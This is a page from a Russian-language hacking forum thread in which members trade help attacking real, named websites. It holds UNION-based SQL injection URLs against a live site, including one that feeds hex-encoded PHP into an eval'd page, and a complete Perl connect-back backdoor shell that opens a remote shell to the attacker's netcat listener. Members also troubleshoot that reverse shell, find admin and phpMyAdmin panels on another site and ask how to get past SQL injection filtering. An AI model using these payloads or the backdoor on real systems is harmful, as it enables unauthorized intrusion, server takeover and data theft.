Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    http://www.stalkerfest.org/page.php?page=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

    О мне выдаёт следующее:
    Parse error: parse error, unexpected $ in /www/kinogild/www/htdocs/stalkerfest/page.php(44) : eval()'d code on line 1

    Как это понимать? Растолкуйте кто нибудь пожалуйста!
     
  2. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    Code:
    http://www.stalkerfest.org/page.php?page=-29+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14--
    вот как бы,если это в виду имел
     
    1 person likes this.
  3. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    Да, имел ввиду именно это. Спасибо. Я просто не сообразил что в желтом поле выводился номер принтабельного поля, думал ошибка какаято.

    Зачем знак комментария в конце? И без него то же самое отображает вроде
     
    #9163 _iks_, 8 Oct 2009
    Last edited: 8 Oct 2009
  4. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://www.stalkerfest.org/page.php?page=-29+union+select+1,2,3,0x706870696e666f28293b,5,6,7,8,9,10,11,12,13,14/*
     
    1 person likes this.
  5. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Не всегда :eek:
     
  6. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    я привык,не всегда нормально отображается без него
     
  7. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Не пойму почему не делается бек-коннект :( Делаю следующее...

    У себя в cmd прописал start nc -l -p 80

    Залил перловый бэкдор

    Code:
    #!/usr/bin/perl 
    use IO::Socket; 
    #IRAN HACKERS SABOTAGE Connect Back Shell 
    #code by:LorD 
    #We Are :LorD-C0d3r-NT 
    # 
    #lord@SlackwareLinux:/home/programing$ perl dc.pl 
    #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
    # 
    #Usage: dc.pl [Host] [Port] 
    # 
    #Ex: dc.pl 127.0.0.1 2121 
    #lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 
    #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
    # 
    #[*] Resolving HostName 
    #[*] Connecting... 127.0.0.1 
    #[*] Spawning Shell 
    #[*] Connected to remote host 
    
    #bash-2.05b# nc -vv -l -p 2121 
    #listening on [any] 2121 ... 
    #connect to [127.0.0.1] from localhost [127.0.0.1] 2121 
    #--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
    # 
    #--==Systeminfo==-- 
    #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux 
    # 
    #--==Userinfo==-- 
    #uid=1001(lord) gid=100(users) groups=100(users) 
    # 
    #--==Directory==-- 
    #/root 
    # 
    #--==Shell==-- 
    # 
    $system = '/bin/sh'; 
    $ARGC=@ARGV; 
    print "--== Backdoor -=====- Hello Melkiy ==-- \n\n"; 
    if ($ARGC!=2) { 
    print "Usage: $0 [Host] [Port] \n\n"; 
    die "Ex: $0 127.0.0.1 2121 \n"; 
    } 
    use Socket; 
    use FileHandle; 
    socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
    connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
    print "[*] Resolving HostName\n"; 
    print "[*] Connecting... $ARGV[0] \n"; 
    print "[*] Spawning Shell \n"; 
    print "[*] Connected to remote host \n"; 
    SOCKET->autoflush(); 
    open(STDIN, ">&SOCKET"); 
    open(STDOUT,">&SOCKET"); 
    open(STDERR,">&SOCKET"); 
    print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n"; 
    system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo; 
    echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); 
    system($system); 
    #EOF
    С шелла пишу perl sd.pl 123.123.123.123[свой IP] 80

    И выдаёт:

    --== Backdoor -=====- Hello Melkiy ==--

    [-] Unable to Connect Host


    В чём проблема? :(

    P.S Пробовал другие порты, тоже самое...
     
  8. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Пинг с шелла идет на ваш IP?
     
  9. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163

    Code:
    C:\Documents and Settings\Администратор>ping ****.ru
    
    Обмен пакетами с ****.ru [**.**.**.53] по 32 байт:
    
    Ответ от **.**.**.**: Заданная сеть недоступна.
    Превышен интервал ожидания для запроса.
    Ответ от **.**.**.**: Заданная сеть недоступна.
    Превышен интервал ожидания для запроса.
    
    Статистика Ping для **.**.**.**:
        Пакетов: отправлено = 4, получено = 2, потеряно = 2 (50% потерь),
    Приблизительное время приема-передачи в мс:
        Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек
    
    :(
     
  10. Vydi

    Vydi Banned

    Joined:
    30 Sep 2009
    Messages:
    8
    Likes Received:
    3
    Reputations:
    0
    Превышен интервал ожидания для запроса.
    Ответ от **.**.**.**: Заданная сеть недоступна.

    Подожди может
     
  11. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    еще вопрос... когда выполняю комманду perl perl.pl [свой IP] 80 сервер тухнет! в чем проблема?

    [500] Internal Server Error

    и так на каждом шелле:( не хочет делать бэк-коннект на мой комп, хотя нет, попробовал с деда - тоже самое

    --

    Это пиздец какой-то =( ни один сервер не может подключится...

    Code:
    --== Backdoor -=====- Hello Melkiy ==--
    
    [-] Unable to Connect Host
    
    в чём проблема-то?:(


    //Разобрался
     
    #9171 .:[melkiy]:., 8 Oct 2009
    Last edited: 8 Oct 2009
  12. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    .:[melkiy]:.: может у тебя не выделенный ip адрес?
     
    1 person likes this.
  13. Torentte

    Torentte New Member

    Joined:
    3 Oct 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Подскажите где сдесь админка?
    _http://infosfera.sfo.ru/a/index.php
     
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://infosfera.sfo.ru/a/forum/admin/
     
  15. Torentte

    Torentte New Member

    Joined:
    3 Oct 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Вроде не совсем то....
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://infosfera.sfo.ru/phpmyadmin/
    не админка, но может оказаться и полезней:)

    PS: Админку что-то своими средствами не нашел, правда искал минут 5. Бежать надо.
     
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Почему же? Я уже и бекконнект сделал :)
     
  18. Torentte

    Torentte New Member

    Joined:
    3 Oct 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    странно,у меня есть и логин и пасс, но чёт не пускает)
     
  19. Torentte

    Torentte New Member

    Joined:
    3 Oct 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    всё работает)спс биг)эт я напутал)))
     
    1 person likes this.
  20. smtgr

    smtgr New Member

    Joined:
    8 Oct 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Доброго времени.
    Нашел вроде SQL-inj:
    http://site.net/index.php?id=777' - выдает пустую страницу
    http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
    http://site.net/index.php?id=777+order+by+10/*-снова пусто
    Подобрал, 3 столбца. Набираю:
    http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
    Похоже на фильтрацию. Какие варианты есть чтобы обойти?

    P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
     
    #9180 smtgr, 8 Oct 2009
    Last edited: 8 Oct 2009
Thread Status:
Not open for further replies.